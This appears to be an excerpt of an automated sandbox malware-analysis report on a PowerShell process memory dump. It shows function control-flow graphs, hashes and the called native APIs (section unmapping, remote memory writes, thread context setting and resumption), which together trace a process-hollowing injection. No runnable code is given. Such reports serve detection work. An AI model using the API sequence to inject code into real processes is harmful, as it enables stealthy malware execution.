                                                                  control_flow_graph 0 7ffd9b8af63e-7ffd9b8af63f 1 7ffd9b8af642-7ffd9b8af645 0->1 2 7ffd9b8af647 1->2 3 7ffd9b8af67d-7ffd9b8af740 call 7ffd9b8ae078 1->3 2->1 4 7ffd9b8af649-7ffd9b8af657 2->4 16 7ffd9b8afd47-7ffd9b8afd62 3->16 17 7ffd9b8af746-7ffd9b8af74b call 7ffd9b8adec0 3->17 4->3 23 7ffd9b8afd69 16->23 20 7ffd9b8af750-7ffd9b8af77d call 7ffd9b8ae088 17->20 27 7ffd9b8afd25-7ffd9b8afd40 20->27 28 7ffd9b8af783-7ffd9b8af78a 20->28 26 7ffd9b8afd6e-7ffd9b8afd89 23->26 38 7ffd9b8afd90-7ffd9b8afdab 26->38 27->16 28->27 31 7ffd9b8af790-7ffd9b8af79b 28->31 31->23 32 7ffd9b8af7a1-7ffd9b8af7a8 31->32 32->23 33 7ffd9b8af7ae-7ffd9b8af7cc call 7ffd9b8adec0 call 7ffd9b8ae088 32->33 42 7ffd9b8afd03-7ffd9b8afd1e 33->42 43 7ffd9b8af7d2-7ffd9b8af7d5 33->43 48 7ffd9b8afdb2-7ffd9b8afdcd 38->48 42->27 43->42 46 7ffd9b8af7db-7ffd9b8af806 call 7ffd9b8ae098 43->46 46->42 52 7ffd9b8af80c-7ffd9b8af8f6 call 7ffd9b8adec0 * 2 call 7ffd9b8ae0a8 46->52 56 7ffd9b8afdd4-7ffd9b8afdde 48->56 52->26 68 7ffd9b8af8fc-7ffd9b8af921 call 7ffd9b8ae0b8 52->68 58 7ffd9b8afdfb-7ffd9b8afe0b 56->58 72 7ffd9b8af926-7ffd9b8af94c call 7ffd9b8ae0c8 68->72 74 7ffd9b8af951-7ffd9b8af953 72->74 74->38 75 7ffd9b8af959-7ffd9b8af976 call 7ffd9b8ae0d8 74->75 75->38 78 7ffd9b8af97c-7ffd9b8af99d call 7ffd9b8ae0e8 75->78 78->38 81 7ffd9b8af9a3-7ffd9b8af9a8 78->81 82 7ffd9b8afb95-7ffd9b8afbb9 call 7ffd9b8ae0f8 81->82 83 7ffd9b8af9ae-7ffd9b8afa05 81->83 90 7ffd9b8afc7b-7ffd9b8afc96 82->90 91 7ffd9b8afbbf-7ffd9b8afbfe call 7ffd9b8ae0d8 82->91 97 7ffd9b8afa0b-7ffd9b8afb11 call 7ffd9b8ae0d8 83->97 98 7ffd9b8afc4d-7ffd9b8afc4e 83->98 100 7ffd9b8afc9d-7ffd9b8afcb8 90->100 91->100 106 7ffd9b8afc04-7ffd9b8afc2d call 7ffd9b8ae108 91->106 97->48 132 7ffd9b8afb17-7ffd9b8afb2d 97->132 105 7ffd9b8afc59-7ffd9b8afc74 98->105 113 7ffd9b8afcbf-7ffd9b8afcda 100->113 105->90 106->113 118 7ffd9b8afc33-7ffd9b8afc3a call 7ffd9b8ae118 106->118 124 7ffd9b8afce1-7ffd9b8afcfc 113->124 121 7ffd9b8afc3f-7ffd9b8afc42 118->121 123 7ffd9b8afc48 121->123 121->124 123->58 124->42 132->56 133 7ffd9b8afb33-7ffd9b8afb80 call 7ffd9b8adeb8 call 7ffd9b8ae0e8 132->133 133->105 138 7ffd9b8afb86-7ffd9b8afb8f 133->138 138->82 138->83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ($@
                                                                  • API String ID: 0-1311469180
                                                                  • Opcode ID: 240e18dd340719dd5743e3a055f3b553731c62f54a0231ad009cfdce4d21ce0e
                                                                  • Instruction ID: 0957493236c6543fac53c74e23f2f36634a0a8e3760e971f3fa666138ff12b92
                                                                  • Opcode Fuzzy Hash: 240e18dd340719dd5743e3a055f3b553731c62f54a0231ad009cfdce4d21ce0e
                                                                  • Instruction Fuzzy Hash: BD32E530F19A4D4BEB68EBA888667FD73E1FF98300F51017AD44ED36D6DE2869418781
                                                                  Function 00007FFD9B8AF659 Relevance: 3.1, Strings: 2, Instructions: 555COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 7ffd9b8af659-7ffd9b8af740 call 7ffd9b8ae078 152 7ffd9b8afd47-7ffd9b8afd62 139->152 153 7ffd9b8af746-7ffd9b8af74b call 7ffd9b8adec0 139->153 159 7ffd9b8afd69 152->159 156 7ffd9b8af750-7ffd9b8af77d call 7ffd9b8ae088 153->156 163 7ffd9b8afd25-7ffd9b8afd40 156->163 164 7ffd9b8af783-7ffd9b8af78a 156->164 162 7ffd9b8afd6e-7ffd9b8afd89 159->162 174 7ffd9b8afd90-7ffd9b8afdab 162->174 163->152 164->163 167 7ffd9b8af790-7ffd9b8af79b 164->167 167->159 168 7ffd9b8af7a1-7ffd9b8af7a8 167->168 168->159 169 7ffd9b8af7ae-7ffd9b8af7cc call 7ffd9b8adec0 call 7ffd9b8ae088 168->169 178 7ffd9b8afd03-7ffd9b8afd1e 169->178 179 7ffd9b8af7d2-7ffd9b8af7d5 169->179 184 7ffd9b8afdb2-7ffd9b8afdcd 174->184 178->163 179->178 182 7ffd9b8af7db-7ffd9b8af806 call 7ffd9b8ae098 179->182 182->178 188 7ffd9b8af80c-7ffd9b8af8f6 call 7ffd9b8adec0 * 2 call 7ffd9b8ae0a8 182->188 192 7ffd9b8afdd4-7ffd9b8afdde 184->192 188->162 204 7ffd9b8af8fc-7ffd9b8af921 call 7ffd9b8ae0b8 188->204 194 7ffd9b8afdfb-7ffd9b8afe0b 192->194 208 7ffd9b8af926-7ffd9b8af94c call 7ffd9b8ae0c8 204->208 210 7ffd9b8af951-7ffd9b8af953 208->210 210->174 211 7ffd9b8af959-7ffd9b8af976 call 7ffd9b8ae0d8 210->211 211->174 214 7ffd9b8af97c-7ffd9b8af99d call 7ffd9b8ae0e8 211->214 214->174 217 7ffd9b8af9a3-7ffd9b8af9a8 214->217 218 7ffd9b8afb95-7ffd9b8afbb9 call 7ffd9b8ae0f8 217->218 219 7ffd9b8af9ae-7ffd9b8afa05 217->219 226 7ffd9b8afc7b-7ffd9b8afc96 218->226 227 7ffd9b8afbbf-7ffd9b8afbfe call 7ffd9b8ae0d8 218->227 233 7ffd9b8afa0b-7ffd9b8afb11 call 7ffd9b8ae0d8 219->233 234 7ffd9b8afc4d-7ffd9b8afc4e 219->234 236 7ffd9b8afc9d-7ffd9b8afcb8 226->236 227->236 242 7ffd9b8afc04-7ffd9b8afc2d call 7ffd9b8ae108 227->242 233->184 268 7ffd9b8afb17-7ffd9b8afb2d 233->268 241 7ffd9b8afc59-7ffd9b8afc74 234->241 249 7ffd9b8afcbf-7ffd9b8afcda 236->249 241->226 242->249 254 7ffd9b8afc33-7ffd9b8afc3a call 7ffd9b8ae118 242->254 260 7ffd9b8afce1-7ffd9b8afcfc 249->260 257 7ffd9b8afc3f-7ffd9b8afc42 254->257 259 7ffd9b8afc48 257->259 257->260 259->194 260->178 268->192 269 7ffd9b8afb33-7ffd9b8afb80 call 7ffd9b8adeb8 call 7ffd9b8ae0e8 268->269 269->241 274 7ffd9b8afb86-7ffd9b8afb8f 269->274 274->218 274->219
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ($@
                                                                  • API String ID: 0-1311469180
                                                                  • Opcode ID: ced20436940b4a3cbc61d766e2563bd523ab058f388d7c5809258528da5d038d
                                                                  • Instruction ID: 3bc4683d4aa383c45c6fc3347170dd098369b6290aad2d8e446b72a7b41136ed
                                                                  • Opcode Fuzzy Hash: ced20436940b4a3cbc61d766e2563bd523ab058f388d7c5809258528da5d038d
                                                                  • Instruction Fuzzy Hash: 5C02B130A0864D4BEB68EFA88861BFD77E2FF58300F11417ED44ED3696DE38A9418B51
                                                                  Function 00007FFD9B8AFDE9 Relevance: 3.0, Strings: 2, Instructions: 512COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 275 7ffd9b8afde9-7ffd9b8afdf5 276 7ffd9b8afdfb-7ffd9b8afe0b 275->276 277 7ffd9b8af6ba-7ffd9b8af740 call 7ffd9b8ae078 275->277 287 7ffd9b8afd47-7ffd9b8afd62 277->287 288 7ffd9b8af746-7ffd9b8af77d call 7ffd9b8adec0 call 7ffd9b8ae088 277->288 294 7ffd9b8afd69 287->294 298 7ffd9b8afd25-7ffd9b8afd40 288->298 299 7ffd9b8af783-7ffd9b8af78a 288->299 297 7ffd9b8afd6e-7ffd9b8afd89 294->297 309 7ffd9b8afd90-7ffd9b8afdab 297->309 298->287 299->298 302 7ffd9b8af790-7ffd9b8af79b 299->302 302->294 303 7ffd9b8af7a1-7ffd9b8af7a8 302->303 303->294 304 7ffd9b8af7ae-7ffd9b8af7cc call 7ffd9b8adec0 call 7ffd9b8ae088 303->304 313 7ffd9b8afd03-7ffd9b8afd1e 304->313 314 7ffd9b8af7d2-7ffd9b8af7d5 304->314 319 7ffd9b8afdb2-7ffd9b8afdcd 309->319 313->298 314->313 317 7ffd9b8af7db-7ffd9b8af806 call 7ffd9b8ae098 314->317 317->313 323 7ffd9b8af80c-7ffd9b8af8f6 call 7ffd9b8adec0 * 2 call 7ffd9b8ae0a8 317->323 327 7ffd9b8afdd4-7ffd9b8afdde 319->327 323->297 338 7ffd9b8af8fc-7ffd9b8af953 call 7ffd9b8ae0b8 call 7ffd9b8ae0c8 323->338 327->276 338->309 345 7ffd9b8af959-7ffd9b8af976 call 7ffd9b8ae0d8 338->345 345->309 348 7ffd9b8af97c-7ffd9b8af99d call 7ffd9b8ae0e8 345->348 348->309 351 7ffd9b8af9a3-7ffd9b8af9a8 348->351 352 7ffd9b8afb95-7ffd9b8afbb9 call 7ffd9b8ae0f8 351->352 353 7ffd9b8af9ae-7ffd9b8afa05 351->353 360 7ffd9b8afc7b-7ffd9b8afc96 352->360 361 7ffd9b8afbbf-7ffd9b8afbfe call 7ffd9b8ae0d8 352->361 367 7ffd9b8afa0b-7ffd9b8afb11 call 7ffd9b8ae0d8 353->367 368 7ffd9b8afc4d-7ffd9b8afc4e 353->368 370 7ffd9b8afc9d-7ffd9b8afcb8 360->370 361->370 376 7ffd9b8afc04-7ffd9b8afc2d call 7ffd9b8ae108 361->376 367->319 402 7ffd9b8afb17-7ffd9b8afb2d 367->402 375 7ffd9b8afc59-7ffd9b8afc74 368->375 383 7ffd9b8afcbf-7ffd9b8afcda 370->383 375->360 376->383 388 7ffd9b8afc33-7ffd9b8afc3a call 7ffd9b8ae118 376->388 394 7ffd9b8afce1-7ffd9b8afcfc 383->394 391 7ffd9b8afc3f-7ffd9b8afc42 388->391 393 7ffd9b8afc48 391->393 391->394 393->276 394->313 402->327 403 7ffd9b8afb33-7ffd9b8afb80 call 7ffd9b8adeb8 call 7ffd9b8ae0e8 402->403 403->375 408 7ffd9b8afb86-7ffd9b8afb8f 403->408 408->352 408->353
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ($@
                                                                  • API String ID: 0-1311469180
                                                                  • Opcode ID: 0c2911d09444e4eeb05f7e527314d4d8a9894db8dbd21f4b28a207f527ef36ef
                                                                  • Instruction ID: 5d5d3882317e053f90ca744beca4d9ca6bcd05d947afb0ef2e92dd18dbcbad03
                                                                  • Opcode Fuzzy Hash: 0c2911d09444e4eeb05f7e527314d4d8a9894db8dbd21f4b28a207f527ef36ef
                                                                  • Instruction Fuzzy Hash: B3029F30B0864D4BEB68EFA8C4A1BBD73E2FF98304F114179D44ED3696DE38A9418B51
                                                                  Function 00007FFD9B8ADF98 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 513 7ffd9b8adf98-7ffd9b8ae049 528 7ffd9b8ae04b-7ffd9b8ae069 513->528 529 7ffd9b8ae0af-7ffd9b8b0b08 NtUnmapViewOfSection 513->529 535 7ffd9b8b0b0a 529->535 536 7ffd9b8b0b10-7ffd9b8b0b2c 529->536 535->536
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05b9a10355d0b3120ede95df161664e8189e4c1c8f98931b03c817d2177be05a
                                                                  • Instruction ID: 8cf4d529516f007a0e07a1c688a4c80e8ae75ae2c50166628a1c7c8374c51d50
                                                                  • Opcode Fuzzy Hash: 05b9a10355d0b3120ede95df161664e8189e4c1c8f98931b03c817d2177be05a
                                                                  • Instruction Fuzzy Hash: 2E516B72A0E7DC4FDB16DBA858696E63FA0EF97210F0941FFC089C70A3E9545906C391
                                                                  Function 00007FFD9B8B0C5D Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 556 7ffd9b8b0c5d-7ffd9b8b0c69 557 7ffd9b8b0c6b-7ffd9b8b0c73 556->557 558 7ffd9b8b0c74-7ffd9b8b0ce8 556->558 557->558 562 7ffd9b8b0cea-7ffd9b8b0cef 558->562 563 7ffd9b8b0cf2-7ffd9b8b0d35 NtWriteVirtualMemory 558->563 562->563 564 7ffd9b8b0d37 563->564 565 7ffd9b8b0d3d-7ffd9b8b0d5a 563->565 564->565
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3527976591-0
                                                                  • Opcode ID: 1cd7b217857121db9bf73fdfdcd0e56c0410441445e9e9caa59a1e29196587ce
                                                                  • Instruction ID: e616fbb69b8d673e337add91f0c875ac2fbad7786dfc70a5261058a0b192fc72
                                                                  • Opcode Fuzzy Hash: 1cd7b217857121db9bf73fdfdcd0e56c0410441445e9e9caa59a1e29196587ce
                                                                  • Instruction Fuzzy Hash: 4D31D33191CB5C8FDB18DF58D885AE9BBE0FF5A321F04426ED049D3692CB70A806CB81
                                                                  Function 00007FFD9B8AE078 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 566 7ffd9b8ae078-7ffd9b8b0b08 NtUnmapViewOfSection 577 7ffd9b8b0b0a 566->577 578 7ffd9b8b0b10-7ffd9b8b0b2c 566->578 577->578
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: 5b7631f425297cdf70ab2d07af0f796cd12b59449e4ff3fa7d46f6eab53e8ee8
                                                                  • Instruction ID: 9eb818b10a3630f4528555fc0a4000c105797494c8ee7870a23b4c8c1a5ee69e
                                                                  • Opcode Fuzzy Hash: 5b7631f425297cdf70ab2d07af0f796cd12b59449e4ff3fa7d46f6eab53e8ee8
                                                                  • Instruction Fuzzy Hash: 68314672A0DB4C8FEB58CB98D8497A97BE0FBA9320F04416BD049C71A2E670A945C751
                                                                  Function 00007FFD9B8B0A3E Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 579 7ffd9b8b0a3e-7ffd9b8b0a4b 580 7ffd9b8b0a56-7ffd9b8b0b08 NtUnmapViewOfSection 579->580 581 7ffd9b8b0a4d-7ffd9b8b0a55 579->581 585 7ffd9b8b0b0a 580->585 586 7ffd9b8b0b10-7ffd9b8b0b2c 580->586 581->580 585->586
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: c628d6fd3c5aa4c9c370e4f2c7c4cedc9ff61277e91eadbe2f06d47151639415
                                                                  • Instruction ID: 7c54ebf833af039c9f53652bd74b4c3a58405f954e25e3c5345e7483cc0a6097
                                                                  • Opcode Fuzzy Hash: c628d6fd3c5aa4c9c370e4f2c7c4cedc9ff61277e91eadbe2f06d47151639415
                                                                  • Instruction Fuzzy Hash: CC31073050D7888FDB5ADBA8CC557A97FE0EF56320F04429BD049C71A3D664A446CB92
                                                                  Function 00007FFD9B8B0FE4 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 587 7ffd9b8b0fe4-7ffd9b8b0feb 588 7ffd9b8b0ff6-7ffd9b8b10a2 NtResumeThread 587->588 589 7ffd9b8b0fed-7ffd9b8b0ff5 587->589 593 7ffd9b8b10aa-7ffd9b8b10c6 588->593 594 7ffd9b8b10a4 588->594 589->588 594->593
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: d7e84ab42f08bccfaa7c26eaa299c0d439232ed62c1a87a6e67b8417ecf1d962
                                                                  • Instruction ID: e8a2ba6e9b08658fc3bea502c9ff217ea57b99100d3471f53e0bd10c6d3c3899
                                                                  • Opcode Fuzzy Hash: d7e84ab42f08bccfaa7c26eaa299c0d439232ed62c1a87a6e67b8417ecf1d962
                                                                  • Instruction Fuzzy Hash: 52312830A0C64C8FDB58DF9CD845BE9BBE1EF5A320F04416BD049C7292DB70A842CB91
                                                                  Function 00007FFD9B8B0F20 Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 595 7ffd9b8b0f20-7ffd9b8b0fb8 NtSetContextThread 599 7ffd9b8b0fba 595->599 600 7ffd9b8b0fc0-7ffd9b8b0fdc 595->600 599->600
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: a99dd98540d280b70b219f943858c299ee51a6111ead28e815c656323466fe58
                                                                  • Instruction ID: 2e6ef34310ec199f186715fa25ae3b56e624f801d474fa987ad3a092ba866d5e
                                                                  • Opcode Fuzzy Hash: a99dd98540d280b70b219f943858c299ee51a6111ead28e815c656323466fe58
                                                                  • Instruction Fuzzy Hash: 4D219131A0CB4C8FDB58DF98D846BE97BF0EB5A320F04416FD049C7256D674A856CB91
                                                                  Function 00007FFD9B8ADCD3 Relevance: .3, Instructions: 277COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd867a7ffd8d826bc3ad51c78291f1a21242d69eddc3ad7553be11ed2516d461
                                                                  • Instruction ID: 574616ff617c990fcf175933e0abe552e1446f37db422eef747ba38ad9f51036
                                                                  • Opcode Fuzzy Hash: cd867a7ffd8d826bc3ad51c78291f1a21242d69eddc3ad7553be11ed2516d461
                                                                  • Instruction Fuzzy Hash: F1713821F0DA4D0EE729A7A848252FE77E1EF89300F56453ED09EC31E7ED29A9024352
                                                                  Function 00007FFD9B8ADD58 Relevance: .3, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e3408b4e5882b44d0abbf1281f2ee304ea06a46e73d26eaed76b75f82de6345
                                                                  • Instruction ID: c5e88f9cbed28643348f1573172c28e01deef98540dd202d8c849d0a782d94f2
                                                                  • Opcode Fuzzy Hash: 4e3408b4e5882b44d0abbf1281f2ee304ea06a46e73d26eaed76b75f82de6345
                                                                  • Instruction Fuzzy Hash: CB71D931F1D90D4AE72CABA858626FE72D2EF9C305F51453DD45FC35DAED28A9024282
                                                                  Function 00007FFD9B8AE329 Relevance: .2, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b986a733e0f44b48b086973fb5f7eb90985f625b253dd8692c2579ccf889a391
                                                                  • Instruction ID: 8c1b76da22c236d971837def0b1ce38696c010034894626a6b0d3670c720b94a
                                                                  • Opcode Fuzzy Hash: b986a733e0f44b48b086973fb5f7eb90985f625b253dd8692c2579ccf889a391
                                                                  • Instruction Fuzzy Hash: AB612831F0DA0D0AE76CABA858222FE73D2EF88315F51453ED45FC35E6ED29A9034252
                                                                  Function 00007FFD9B8B0221 Relevance: 2.4, APIs: 1, Instructions: 897processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 409 7ffd9b8b0221-7ffd9b8b022d 410 7ffd9b8b0238-7ffd9b8b0249 409->410 411 7ffd9b8b022f-7ffd9b8b0237 409->411 412 7ffd9b8b024b-7ffd9b8b028c 410->412 413 7ffd9b8b028d-7ffd9b8b0686 410->413 411->410 412->413 420 7ffd9b8b0688-7ffd9b8b0695 413->420 421 7ffd9b8b0696-7ffd9b8b06f2 413->421 420->421 424 7ffd9b8b0750-7ffd9b8b0782 421->424 425 7ffd9b8b06f4-7ffd9b8b0703 421->425 430 7ffd9b8b07e0-7ffd9b8b0831 424->430 431 7ffd9b8b0784-7ffd9b8b0793 424->431 425->424 426 7ffd9b8b0705-7ffd9b8b0708 425->426 427 7ffd9b8b070a-7ffd9b8b071d 426->427 428 7ffd9b8b0742-7ffd9b8b074a 426->428 432 7ffd9b8b071f 427->432 433 7ffd9b8b0721-7ffd9b8b0734 427->433 428->424 441 7ffd9b8b088f-7ffd9b8b08c0 430->441 442 7ffd9b8b0833-7ffd9b8b0842 430->442 431->430 434 7ffd9b8b0795-7ffd9b8b0798 431->434 432->433 433->433 435 7ffd9b8b0736-7ffd9b8b073e 433->435 436 7ffd9b8b079a-7ffd9b8b07ad 434->436 437 7ffd9b8b07d2-7ffd9b8b07da 434->437 435->428 439 7ffd9b8b07af 436->439 440 7ffd9b8b07b1-7ffd9b8b07c4 436->440 437->430 439->440 440->440 443 7ffd9b8b07c6-7ffd9b8b07ce 440->443 448 7ffd9b8b08ce-7ffd9b8b094e CreateProcessA 441->448 449 7ffd9b8b08c2-7ffd9b8b08ca 441->449 442->441 444 7ffd9b8b0844-7ffd9b8b0847 442->444 443->437 446 7ffd9b8b0849-7ffd9b8b085c 444->446 447 7ffd9b8b0881-7ffd9b8b0889 444->447 450 7ffd9b8b0860-7ffd9b8b0873 446->450 451 7ffd9b8b085e 446->451 447->441 452 7ffd9b8b0956-7ffd9b8b098b call 7ffd9b8b09af 448->452 453 7ffd9b8b0950 448->453 449->448 450->450 454 7ffd9b8b0875-7ffd9b8b087d 450->454 451->450 457 7ffd9b8b099b-7ffd9b8b09ae 452->457 458 7ffd9b8b098d-7ffd9b8b0993 452->458 453->452 454->447 459 7ffd9b8b0995 458->459 460 7ffd9b8b099a 458->460 459->460 460->457
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 6257ebf1181c19f11cea7f523e81e267bf7a48be6a2dccbb244d326b14dfe1d8
                                                                  • Instruction ID: 40610f5da7b392c08fa20d730cf6bf18477b02c7e0046f80a0a53895fa88491a
                                                                  • Opcode Fuzzy Hash: 6257ebf1181c19f11cea7f523e81e267bf7a48be6a2dccbb244d326b14dfe1d8
                                                                  • Instruction Fuzzy Hash: 08D14530A19B8D8FEB64DF68CC567E977E0FF59310F01426AD84DC7292DA34A9458BC2
                                                                  Function 00007FFD9B8AEAFA Relevance: 1.7, APIs: 1, Instructions: 249COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 461 7ffd9b8aeafa-7ffd9b8aeb07 462 7ffd9b8aeb09-7ffd9b8aeb11 461->462 463 7ffd9b8aeb12-7ffd9b8aeb6d 461->463 462->463 465 7ffd9b8aeb6f-7ffd9b8aeb7c 463->465 466 7ffd9b8aeb7d-7ffd9b8aebdf 463->466 465->466 469 7ffd9b8aec3a-7ffd9b8aecb7 CreateFileMappingW 466->469 470 7ffd9b8aebe1-7ffd9b8aebf0 466->470 477 7ffd9b8aecb9 469->477 478 7ffd9b8aecbf-7ffd9b8aecf3 call 7ffd9b8aed17 469->478 470->469 471 7ffd9b8aebf2-7ffd9b8aebf5 470->471 472 7ffd9b8aebf7-7ffd9b8aec0a 471->472 473 7ffd9b8aec2f-7ffd9b8aec37 471->473 475 7ffd9b8aec0c 472->475 476 7ffd9b8aec0e-7ffd9b8aec21 472->476 473->469 475->476 476->476 479 7ffd9b8aec23-7ffd9b8aec2b 476->479 477->478 483 7ffd9b8aecf5-7ffd9b8aecfb 478->483 484 7ffd9b8aed03-7ffd9b8aed16 478->484 479->473 485 7ffd9b8aecfd 483->485 486 7ffd9b8aed02 483->486 485->486 486->484
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileMapping
                                                                  • String ID:
                                                                  • API String ID: 524692379-0
                                                                  • Opcode ID: 0142ca6e13d5b59f89199da0685bda72f0c5a50181f07c6fa604adb0628e125e
                                                                  • Instruction ID: 8608a86a17b2dc0420d8203c0d23d0115c7c5dbe054e48a7457cecadd118819f
                                                                  • Opcode Fuzzy Hash: 0142ca6e13d5b59f89199da0685bda72f0c5a50181f07c6fa604adb0628e125e
